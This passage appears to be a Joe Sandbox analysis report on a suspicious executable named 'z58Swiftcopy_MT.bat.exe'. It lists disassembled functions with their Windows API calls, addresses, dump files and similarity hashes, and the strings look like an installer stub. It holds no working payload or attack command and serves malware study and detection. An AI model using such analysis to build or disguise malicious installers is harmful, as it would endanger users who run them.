                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                      • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                                                                                                                                                      • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                                                                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                                                                                                                                                      • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                                                                                                                                                      • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                                                                                                                                                      • DrawTextA.USER32(00000000,00423F20,000000FF,00000010,00000820), ref: 00401156
                                                                                                                                                                                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 00401165
                                                                                                                                                                                                                                      • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                      • String ID: F
                                                                                                                                                                                                                                      • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                      • Opcode ID: bdf52cc5ae8694a0bdbebf00984b2734c5f81ee4e26e9c894a20d3f53608c02a
                                                                                                                                                                                                                                      • Instruction ID: efe066deb40a78245321151b9dab29af26a41e73ee4a669cec0cc25ab5e9cd35
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bdf52cc5ae8694a0bdbebf00984b2734c5f81ee4e26e9c894a20d3f53608c02a
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89418C71800209AFCF058F95DE459AFBBB9FF45315F00802EF5A1AA1A0CB389A55DFA4
                                                                                                                                                                                                                                      Function 00405D08 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 129memorystringCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00405E99,?,?), ref: 00405D39
                                                                                                                                                                                                                                      • GetShortPathNameA.KERNEL32(?,00422AC0,00000400), ref: 00405D42
                                                                                                                                                                                                                                        • Part of subcall function 00405B97: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BA7
                                                                                                                                                                                                                                        • Part of subcall function 00405B97: lstrlenA.KERNEL32(00000000,?,00000000,00405DF2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD9
                                                                                                                                                                                                                                      • GetShortPathNameA.KERNEL32(?,00422EC0,00000400), ref: 00405D5F
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00405D7D
                                                                                                                                                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,00422EC0,C0000000,00000004,00422EC0,?,?,?,?,?), ref: 00405DB8
                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 00405DC7
                                                                                                                                                                                                                                      • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DFF
                                                                                                                                                                                                                                      • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,004226C0,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00405E55
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 00405E66
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00405E6D
                                                                                                                                                                                                                                        • Part of subcall function 00405C32: GetFileAttributesA.KERNELBASE(00000003,00402DDB,C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe,80000000,00000003), ref: 00405C36
                                                                                                                                                                                                                                        • Part of subcall function 00405C32: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405C58
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                                                                                                                                                                                                      • String ID: %s=%s$[Rename]
                                                                                                                                                                                                                                      • API String ID: 2171350718-1727408572
                                                                                                                                                                                                                                      • Opcode ID: f38d8d20ea3c52f409b1efdd4663a8df0a06a90a62bb981f7671b6e2d5e9100d
                                                                                                                                                                                                                                      • Instruction ID: d3b28aaf25f2f1dce52cf372ecf52c774524a9466fe584fbe8e796e5af075e1b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f38d8d20ea3c52f409b1efdd4663a8df0a06a90a62bb981f7671b6e2d5e9100d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 97312331200B19BBC2206B61EE49F2B3A5CDF85754F14043AF985F62D2DB7CA9018ABD
                                                                                                                                                                                                                                      Function 00406303 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe",762D3410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040635B
                                                                                                                                                                                                                                      • CharNextA.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406368
                                                                                                                                                                                                                                      • CharNextA.USER32(?,"C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe",762D3410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040636D
                                                                                                                                                                                                                                      • CharPrevA.USER32(?,?,762D3410,C:\Users\user\AppData\Local\Temp\,00000000,004032E8,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403521,?,00000006,00000008,0000000A), ref: 0040637D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      • *?|<>/":, xrefs: 0040634B
                                                                                                                                                                                                                                      • "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe", xrefs: 0040633F
                                                                                                                                                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00406304
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Char$Next$Prev
                                                                                                                                                                                                                                      • String ID: "C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                                                                                      • API String ID: 589700163-3315247575
                                                                                                                                                                                                                                      • Opcode ID: b04103f1c3b5c2dc28f3c9fe732184cb0b910e084cb0e1e3de7299130b8356f6
                                                                                                                                                                                                                                      • Instruction ID: aaadfa82e77317605f3281ec64e2e7980eb4a55dd70e9bd95d11bcdf30b36afc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b04103f1c3b5c2dc28f3c9fe732184cb0b910e084cb0e1e3de7299130b8356f6
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6011826180479129EB3216384C44BBBAFD84B57760F5A407FEDC6722C2D67C6C6286AD
                                                                                                                                                                                                                                      Function 004041C1 Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetWindowLongA.USER32(?,000000EB), ref: 004041DE
                                                                                                                                                                                                                                      • GetSysColor.USER32(00000000), ref: 004041FA
                                                                                                                                                                                                                                      • SetTextColor.GDI32(?,00000000), ref: 00404206
                                                                                                                                                                                                                                      • SetBkMode.GDI32(?,?), ref: 00404212
                                                                                                                                                                                                                                      • GetSysColor.USER32(?), ref: 00404225
                                                                                                                                                                                                                                      • SetBkColor.GDI32(?,?), ref: 00404235
                                                                                                                                                                                                                                      • DeleteObject.GDI32(?), ref: 0040424F
                                                                                                                                                                                                                                      • CreateBrushIndirect.GDI32(?), ref: 00404259
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2320649405-0
                                                                                                                                                                                                                                      • Opcode ID: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                                                                                                                                                                                                                                      • Instruction ID: ef1bd211f687dc199c5e2a556594d88cbafbffeaa14e1023ebc7d04ec3d96a61
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae3d8a9df92c775f8f54e71e017c7c1ec6869770dfd215418e325c2b67ca61e7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A32184B1504704ABC7219F78DD08B5BBBF8AF81714F04896DFAD5E26A0D734E944CB64
                                                                                                                                                                                                                                      Function 100023D8 Relevance: 10.6, APIs: 7, Instructions: 111COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(00000040,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(?), ref: 100024B3
                                                                                                                                                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100024ED
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27696729250.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696679274.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696753129.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27696776514.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_10000000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Global$Free$Alloc
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1780285237-0
                                                                                                                                                                                                                                      • Opcode ID: 9b8f7426cd7417a05f7efaca6ab9ef20acf91f7aea9c9defdea317c740d0f0ba
                                                                                                                                                                                                                                      • Instruction ID: c0db1d51d0d8beb2da32add46ec64f24e8f484468aa98c5ce89375ba0c102a5a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b8f7426cd7417a05f7efaca6ab9ef20acf91f7aea9c9defdea317c740d0f0ba
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0831A9B1504211EFF322DB94CCC4C2B7BBDEB853D4B118929FA4193228CB31AC94DB62
                                                                                                                                                                                                                                      Function 004051C0 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                                                                                                                                                                                                                      • lstrlenA.KERNEL32(00402D70,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                                                                                                                                                                                                                      • lstrcatA.KERNEL32(00420510,00402D70,00402D70,00420510,00000000,00000000,00000000), ref: 0040521C
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(00420510,00420510), ref: 0040522E
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2531174081-0
                                                                                                                                                                                                                                      • Opcode ID: fcc158ebca62b9556dfbd252b9eba4bb3779b7d310f90d2e7aaaf4a512f9cf01
                                                                                                                                                                                                                                      • Instruction ID: 0096fbd02e39835f1f24d83275f9c38cb3dbb50e4440d35a5143882a1b4174d0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fcc158ebca62b9556dfbd252b9eba4bb3779b7d310f90d2e7aaaf4a512f9cf01
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4D218C71900518BFDF119FA5DD84A9EBFB9FF04354F0480BAF904B6291C7798A418FA8
                                                                                                                                                                                                                                      Function 00402CF9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000), ref: 00402D11
                                                                                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 00402D2F
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00402D5D
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: lstrlenA.KERNEL32(00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000,?), ref: 004051F9
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: lstrlenA.KERNEL32(00402D70,00420510,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D70,00000000), ref: 00405209
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: lstrcatA.KERNEL32(00420510,00402D70,00402D70,00420510,00000000,00000000,00000000), ref: 0040521C
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SetWindowTextA.USER32(00420510,00420510), ref: 0040522E
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405254
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040526E
                                                                                                                                                                                                                                        • Part of subcall function 004051C0: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040527C
                                                                                                                                                                                                                                      • CreateDialogParamA.USER32(0000006F,00000000,00402C61,00000000), ref: 00402D81
                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,00000005), ref: 00402D8F
                                                                                                                                                                                                                                        • Part of subcall function 00402CDD: MulDiv.KERNEL32(00000000,00000064,00020B0D), ref: 00402CF2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
                                                                                                                                                                                                                                      • String ID: ... %d%%
                                                                                                                                                                                                                                      • API String ID: 722711167-2449383134
                                                                                                                                                                                                                                      • Opcode ID: 581d0362c9c78e99b63bfe565d6ea7dfe38dfe796f0dab54d06828bbe0081036
                                                                                                                                                                                                                                      • Instruction ID: 05ae4936d853d48bc68e56bc5a14e51e8e164cb381f888baae312624535d0e7d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 581d0362c9c78e99b63bfe565d6ea7dfe38dfe796f0dab54d06828bbe0081036
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3601D630901620EBD722AB60BF0CEDE7A78EF48701B44003BF555B51E4CBB84C41CA9E
                                                                                                                                                                                                                                      Function 00404A8B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404AA6
                                                                                                                                                                                                                                      • GetMessagePos.USER32 ref: 00404AAE
                                                                                                                                                                                                                                      • ScreenToClient.USER32(?,?), ref: 00404AC8
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404ADA
                                                                                                                                                                                                                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404B00
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Message$Send$ClientScreen
                                                                                                                                                                                                                                      • String ID: f
                                                                                                                                                                                                                                      • API String ID: 41195575-1993550816
                                                                                                                                                                                                                                      • Opcode ID: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                                                                                                                                                                                      • Instruction ID: d6f0acc73841e927dc0e8d5cbc3229ede44acf808998aa5f41192725d6cd764a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 33c806690141bddee9d4868c528a06b643bfd418e36cfd9cd505f5ef0f9636f7
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03019275900219BADB00DB95CD81BFFBBBCAF45711F10012BBA10B61C0C7B495018F94
                                                                                                                                                                                                                                      Function 00402C61 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON
                                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C7C
                                                                                                                                                                                                                                      • wsprintfA.USER32 ref: 00402CB0
                                                                                                                                                                                                                                      • SetWindowTextA.USER32(?,?), ref: 00402CC0
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402CD2
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000000.00000002.27691682433.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691634693.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691726722.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691769998.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000000.00000002.27691943763.0000000000435000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                                                                                                                                      • String ID: unpacking data: %d%%$verifying installer: %d%%
